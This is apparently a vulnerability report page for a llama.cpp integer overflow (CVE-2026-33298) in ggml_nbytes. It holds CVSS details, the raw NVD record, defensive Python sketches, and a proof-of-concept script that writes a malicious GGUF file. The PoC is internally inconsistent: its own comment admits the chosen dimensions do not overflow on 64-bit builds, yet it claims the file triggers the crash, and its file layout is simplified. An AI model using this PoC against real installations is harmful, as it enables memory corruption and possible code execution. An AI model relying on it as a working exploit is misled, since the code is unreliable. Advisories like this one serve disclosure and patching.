Security Vulnerability Report
CVE-2026-33298 CVSS 7.8 HIGH

CVE-2026-33298

Published: 2026-03-24 01:17:02
Last Modified: 2026-04-30 17:01:02

Description

llama.cpp is a C/C++ implementation of inference for several LLM models. In versions prior to b7824, an integer overflow in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. The overflow causes `ggml_nbytes` to return a size far smaller than required (e.g., 4 MB instead of exabytes), which leads to a heap-based buffer overflow when the application subsequently processes the tensor. The resulting memory corruption can potentially be leveraged for remote code execution (RCE). Build b7824 contains a fix.
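The flaw is an instance of CWE-190 (integer overflow) feeding CWE-122 (heap-based buffer overflow), the two weaknesses listed in the record. As a rough illustration, the Python sketch below models a tensor's byte size as the product of its dimensions and an element size, computed once with C-style unsigned wraparound and once with an explicit overflow check. This is a simplified, hypothetical model: `wrapping_nbytes` and `checked_nbytes` are illustrative names, and the real `ggml_nbytes` also accounts for per-dimension strides and quantization block sizes rather than taking a plain product.

```python
# Hypothetical model of a tensor byte-size computation; this is NOT ggml's code.
SIZE_MAX_64 = (1 << 64) - 1  # largest value a 64-bit size_t can hold


def wrapping_nbytes(dims, type_size, bits=64):
    """Multiply type_size by every dimension the way unsigned C arithmetic
    would: each intermediate product is reduced modulo 2**bits."""
    mask = (1 << bits) - 1
    total = type_size & mask
    for d in dims:
        total = (total * d) & mask
    return total


def checked_nbytes(dims, type_size, limit=SIZE_MAX_64):
    """Return the exact byte count, or raise OverflowError if any
    intermediate product would exceed `limit` (check before multiplying)."""
    if type_size <= 0 or any(d <= 0 for d in dims):
        raise ValueError("dimensions and type size must be positive")
    total = type_size
    for d in dims:
        if total > limit // d:  # total * d would not fit in `limit`
            raise OverflowError("tensor byte size overflows size_t")
        total *= d
    return total


if __name__ == "__main__":
    # (2**62 + 1) elements * 4 bytes = 2**64 + 4, which wraps to 4 in 64 bits.
    print(wrapping_nbytes([(1 << 62) + 1], 4))         # 4
    # The 32-bit case from the PoC comments: 0x100000001 * 4 wraps to 4.
    print(wrapping_nbytes([0x100000001], 4, bits=32))  # 4
    print(checked_nbytes([4096, 4096], 4))             # 67108864
    try:
        checked_nbytes([(1 << 62) + 1], 4)
    except OverflowError as exc:
        print("rejected:", exc)
```

Comparing against `limit // d` before multiplying keeps the check itself from overflowing when the same pattern is ported to C, where the product cannot be computed in wider precision first.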

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
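The 7.8 base score follows from the vector through the CVSS v3.1 base equations. The Python sketch below recomputes it as a cross-check. The metric weights and the `Roundup` rule are transcribed from the FIRST CVSS v3.1 specification (verify them against the specification before relying on this code), the function names are hypothetical, and only base metrics are handled, not temporal or environmental ones.

```python
import math

# CVSS v3.1 base-metric weights, transcribed from the FIRST v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}  # PR weights differ when S:C
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value):
    """CVSS v3.1 Roundup: smallest one-decimal number >= value,
    computed on integers to avoid floating-point artefacts."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def base_scores(vector):
    """Return (base, impact, exploitability) for a CVSS:3.1 base vector."""
    prefix, *parts = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError("expected a CVSS:3.1 vector")
    m = dict(part.split(":") for part in parts)
    changed = m["S"] == "C"

    # Impact sub-score, via the Impact Sub Score (ISS).
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss

    # Exploitability sub-score.
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]

    if impact <= 0:
        base = 0.0
    elif changed:
        base = roundup(min(1.08 * (impact + exploitability), 10))
    else:
        base = roundup(min(impact + exploitability, 10))
    # Sub-scores are reported to one decimal place.
    return base, round(impact, 1), round(exploitability, 1)


if __name__ == "__main__":
    print(base_scores("CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # (7.8, 5.9, 1.8)
```

For this vector: ISS = 1 - (1 - 0.56)^3 = 0.914816, impact = 6.42 × ISS ≈ 5.87, exploitability = 8.22 × 0.55 × 0.77 × 0.85 × 0.62 ≈ 1.83, and base = Roundup(5.87 + 1.83) = 7.8, matching the reported impact score of 5.9, exploitability score of 1.8, and base score of 7.8.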

Configurations (Affected Products)

cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:* - VULNERABLE
llama.cpp < b7824
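The affected range is expressed as a build tag. A minimal Python sketch for checking whether a given tag falls in that range follows; it assumes llama.cpp release tags have the form `b` followed by a monotonically increasing build number, as the tag `b7824` suggests. The helper names are hypothetical, and how you obtain the tag for a particular installation is not covered.

```python
import re

FIXED_BUILD = 7824  # first build containing the fix (tag b7824)


def build_number(tag):
    """Parse a release tag of the assumed form 'bNNNN' into an integer."""
    match = re.fullmatch(r"b(\d+)", tag.strip())
    if match is None:
        raise ValueError(f"unrecognised build tag: {tag!r}")
    return int(match.group(1))


def is_affected(tag):
    """True if the build falls in the vulnerable range '< b7824'."""
    return build_number(tag) < FIXED_BUILD


if __name__ == "__main__":
    for tag in ("b7823", "b7824", "b10000"):
        print(tag, "affected" if is_affected(tag) else "not affected")
```

The tag is compared numerically rather than as a string because lexical ordering breaks once the build number gains a digit: `"b10000" < "b7824"` is true as strings, even though build 10000 is newer.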

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2026-33298: Integer Overflow in llama.cpp ggml_nbytes
# This script demonstrates how to craft a tensor dimension that triggers an overflow.
import struct


def create_malicious_gguf_header():
    # GGUF Magic Number
    magic = b'GGUF'
    version = struct.pack('<I', 3)  # GGUF version 3
    tensor_count = struct.pack('<Q', 1)  # 1 Tensor

    # Tensor Name
    name_len = struct.pack('<Q', 4)
    name = b'test'

    # Tensor Dimensions (n_dims)
    n_dims = struct.pack('<I', 2)  # 2 dimensions

    # Exploit: Set dimensions such that (dim1 * dim2 * type_size) overflows
    # Assuming type Q4_0 (blocks of 32 elements stored in 18 bytes; block count
    # calculated internally) or simply F32 (4 bytes). If we calculate elements = dim1 * dim2.
    # If elements = 0x100000001, and type_size = 4, total = 0x400000004.
    # In 32-bit arithmetic, this wraps to 4.
    # Triggering the overflow in ggml_nbytes calculation
    # We want a huge number of elements that wraps to a small size
    dim1 = 0x10000
    dim2 = 0x10000  # Product = 0x100000000
    # Note: 0x100000000 elements * 4 bytes = 0x400000000 (16 GiB), which fits in a
    # 64-bit size_t; these particular values only wrap under 32-bit arithmetic.

    # Pack dimensions
    dims = struct.pack('<Q', dim1) + struct.pack('<Q', dim2)

    # Tensor Type (e.g., F32 = 0)
    tensor_type = struct.pack('<I', 0)

    # Offset to tensor data (arbitrary for PoC)
    offset = struct.pack('<Q', 1024)

    # Constructing a minimal malicious structure (Simplified)
    payload = magic + version + tensor_count + name_len + name + n_dims + dims + tensor_type + offset

    print("[+] Malicious GGUF structure generated.")
    print("[+] Dimensions: {} x {}".format(dim1, dim2))
    print("[+] Attempting to save to 'exploit.gguf'...")
    with open('exploit.gguf', 'wb') as f:
        f.write(payload)
    print("[+] File saved. Load this in a vulnerable llama.cpp version to trigger the crash.")


if __name__ == "__main__":
    create_malicious_gguf_header()
```

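References

https://github.com/ggml-org/llama.cpp/releases/tag/b7824 (Release Notes)
https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-96jg-mvhq-q7q7 (Exploit, Vendor Advisory)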

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33298",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-24T01:17:01.870",
    "lastModified": "2026-04-30T17:01:02.417",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "llama.cpp is an inference of several LLM models in C/C++. Prior to b7824, an integer overflow vulnerability in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. This causes `ggml_nbytes` to return a significantly smaller size than required (e.g., 4MB instead of Exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. This vulnerability allows potential Remote Code Execution (RCE) via memory corruption. b7824 contains a fix."
      },
      {
        "lang": "es",
        "value": "llama.cpp es una inferencia de varios modelos LLM en C/C++. Antes de b7824, una vulnerabilidad de desbordamiento de entero en la función `ggml_nbytes` permite a un atacante eludir la validación de memoria al crear un archivo GGUF con dimensiones de tensor específicas. Esto hace que `ggml_nbytes` devuelva un tamaño significativamente menor al requerido (por ejemplo, 4MB en lugar de Exabytes), lo que lleva a un desbordamiento de búfer basado en montículo cuando la aplicación procesa posteriormente el tensor. Esta vulnerabilidad permite una posible ejecución remota de código (RCE) a través de corrupción de memoria. b7824 contiene una corrección."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-122"},
          {"lang": "en", "value": "CWE-190"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "b7824",
                "matchCriteriaId": "471181FC-F68E-43C2-AC26-06D790AEE75F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/ggml-org/llama.cpp/releases/tag/b7824",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-96jg-mvhq-q7q7",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```
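The record appears to follow the layout of NVD's CVE API 2.0 `cve` object. The Python sketch below pulls out the fields most often needed for triage (score, severity, CWE IDs, and vulnerable version ranges) from a trimmed copy of the record. The `summarize` helper is hypothetical; it assumes the nesting shown above and reads only the first CVSS v3.1 metric entry.

```python
import json

# A trimmed copy of the record above, keeping only the fields used here.
RECORD = """
{"cve": {"id": "CVE-2026-33298",
  "metrics": {"cvssMetricV31": [{"cvssData": {
      "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "baseScore": 7.8, "baseSeverity": "HIGH"}}]},
  "weaknesses": [{"description": [{"lang": "en", "value": "CWE-122"},
                                  {"lang": "en", "value": "CWE-190"}]}],
  "configurations": [{"nodes": [{"operator": "OR", "negate": false,
      "cpeMatch": [{"vulnerable": true,
                    "criteria": "cpe:2.3:a:ggml:llama.cpp:*:*:*:*:*:*:*:*",
                    "versionEndExcluding": "b7824"}]}]}]}}
"""


def summarize(raw):
    """Extract triage fields from a single CVE record (assumed layout)."""
    cve = json.loads(raw)["cve"]
    cvss = cve["metrics"]["cvssMetricV31"][0]["cvssData"]
    cwes = [d["value"] for w in cve["weaknesses"] for d in w["description"]]
    # Collect (CPE criteria, exclusive upper bound) for every vulnerable match.
    ranges = [
        (match["criteria"], match.get("versionEndExcluding"))
        for cfg in cve["configurations"]
        for node in cfg["nodes"]
        for match in node["cpeMatch"]
        if match["vulnerable"]
    ]
    return {
        "id": cve["id"],
        "score": cvss["baseScore"],
        "severity": cvss["baseSeverity"],
        "cwes": cwes,
        "vulnerable_ranges": ranges,
    }


if __name__ == "__main__":
    print(summarize(RECORD))
```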